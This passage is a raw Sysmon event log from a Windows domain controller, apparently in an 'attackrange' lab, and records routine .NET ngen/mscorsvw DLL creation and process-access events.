{"EventTime":"2020-08-01 08:06:38","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7825,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:06:38.319\r\nProcessGuid: {41C8662E-228D-5F25-0000-0010D4390F00}\r\nProcessId: 4384\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1120-0\\System.IdentityModel.Services.dll\r\nCreationUtcTime: 2020-08-01 08:06:38.319","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:06:38.319","ProcessGuid":"{41C8662E-228D-5F25-0000-0010D4390F00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1120-0\\System.IdentityModel.Services.dll","CreationUtcTime":"2020-08-01 08:06:38.319","EventReceivedTime":"2020-08-01 08:06:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:38","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7826,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:38.350\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-228E-5F25-0000-00101B410F00}\r\nTargetProcessId: 2516\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:38.350","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-228E-5F25-0000-00101B410F00}","TargetProcessId":"2516","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:38","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7827,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:38.350\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-228E-5F25-0000-00101B410F00}\r\nTargetProcessId: 2516\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:38.350","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-228E-5F25-0000-00101B410F00}","TargetProcessId":"2516","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:06:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:38","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7828,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:38.365\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-228E-5F25-0000-00101B410F00}\r\nTargetProcessId: 2516\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:38.365","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-228E-5F25-0000-00101B410F00}","TargetProcessId":"2516","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:38","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7829,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:38.397\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-228E-5F25-0000-00103D440F00}\r\nTargetProcessId: 4436\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:38.397","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-228E-5F25-0000-00103D440F00}","TargetProcessId":"4436","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:38","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7830,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:38.397\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-228E-5F25-0000-00103D440F00}\r\nTargetProcessId: 4436\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:38.397","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-228E-5F25-0000-00103D440F00}","TargetProcessId":"4436","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:06:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:38","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7831,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:38.397\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-228E-5F25-0000-00103D440F00}\r\nTargetProcessId: 4436\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:38.397","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-228E-5F25-0000-00103D440F00}","TargetProcessId":"4436","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:38","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7832,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:06:38.537\r\nProcessGuid: {41C8662E-228E-5F25-0000-00103D440F00}\r\nProcessId: 4436\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1154-0\\System.IO.Compression.dll\r\nCreationUtcTime: 2020-08-01 08:06:38.537","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:06:38.537","ProcessGuid":"{41C8662E-228E-5F25-0000-00103D440F00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1154-0\\System.IO.Compression.dll","CreationUtcTime":"2020-08-01 08:06:38.537","EventReceivedTime":"2020-08-01 08:06:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:38","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7833,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:38.569\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2256-5F25-0000-00101B990D00}\r\nTargetProcessId: 2608\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:38.569","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2256-5F25-0000-00101B990D00}","TargetProcessId":"2608","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\